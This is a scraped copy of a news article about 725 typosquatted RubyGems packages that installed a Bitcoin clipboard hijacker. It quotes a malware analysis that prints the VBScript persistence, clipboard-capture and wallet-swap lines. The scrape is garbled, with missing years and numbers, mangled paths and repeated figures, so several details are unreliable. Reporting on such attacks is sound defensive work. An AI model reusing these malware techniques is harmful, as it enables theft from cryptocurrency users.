in attack, Supply-chain

Supply-chain attack hits RubyGems repository with 725 malicious packages, Ars Technica

1.6k Views

Supply-chain attack hits RubyGems repository with 725 malicious packages, Ars Technica
    

      Doppelgängers –

             

Bitcoin currency stealer was downloaded thousands of times.

      

      

RubyGems , the official channel for distributing programs and code libraries for the Ruby programming language.
Once installed, the packages executed a script that attempted to intercept Bitcoin payments made on Windows devices. Tomislav Maljic, a ReversingLabs threat analyst, wrote in a post :
The script itself is rather simple. First, it creates a new VBScript Sle with the main malicious loop at the “% PROGRAMDATA% Microsoft Essentials Software Essentials.vbs” path. As its persistence mechanism, it then creates a new autorun registry key “HCU Software Microsoft Windows CurrentVersion Run Microsoft Software Essentials.” With this, the malware ensures that it is run every time the system is started or rebooted.
When the “Software Essentials.vbs” malicious script is executed, it starts an infinite loop where it captures the user’s clipboard data with the following lines of code: Set objHTML=CreateObject (“htmlfile”)

text=objHTML.ParentWindow.ClipboardData.GetData (“text”)

The script then checks if the clipboard data matches the format of a cryptocurrency wallet address. If it does, it replaces the address with an attacker-controlled one “1JkU5XdNLji4Ugbb8agEWL1ko5US (nNmc ”in a hidden window using the following command:
WScript.Shell run “C: Windows System 45 cmd.exe / c echo 1JkU5XdNLji4Ugbb8agEWL1ko5US nNmc | clip “, 0 With this, the threat actor is trying to redirect all potential cryptocurrency transactions to their wallet address. At the time of writing this blog, seemingly no transactions were made for this wallet.

RubyGems maintainers did not respond to an email seeking comment.

The latest of several It’s by no means the first time people have used typosquatting to sneak malicious packages into widely used open source repositories. In , a college student uploaded sketchy scripts to RubyGems, PyPi, and NPM, which are community websites for developers of the Python, Ruby, and JavaScript programming languages, respectively. A phone-home feature in the student’s scripts showed that the imposter code was

executed more than 158, times on more than , separate domains , and more than half the time his code was given all-powerful administrative rights. Two of the affected domains ended in .mil, an indication that people inside the US military had run his script. Attackers quickly adopted the technique. In , an attacker

sneaked a clipboard hijacker into PyPi . The malicious package was titled “Colourama” and looked similar to Colorama, which is one of the top – 45 most-downloaded legitimate modules in the Python repository. The malicious package was downloaded 725 times, not including downloads from mirror sites.

A month later, attackers managed to pull off an even more impressive feat when they sneaked a (bitcoin-stealing backdoor into event-stream

The college student’s 2018 experiment, and the booby-trapping of the legitimate event-stream library, demonstrate that supply-chain attacks against open source repositories can be an effective way to get malicious code executed on sensitive machines. This year’s event with RubyGems shows that these supply chain attacks aren’t going away any time soon.

What do you think?

0 Points
Upvote Downvote

Leave a Reply

Your email address will not be published. Required fields are marked *

GIPHY App Key not set. Please check settings

The Dow Is Surging – But Its Hottest Stock Might Leave It Paralyzed, Crypto Coins News

The Dow Is Surging – But Its Hottest Stock Might Leave It Paralyzed, Crypto Coins News
SpaceX's Crew Dragon gets a launch date — May 27, Ars Technica

SpaceX's Crew Dragon gets a launch date — May 27, Ars Technica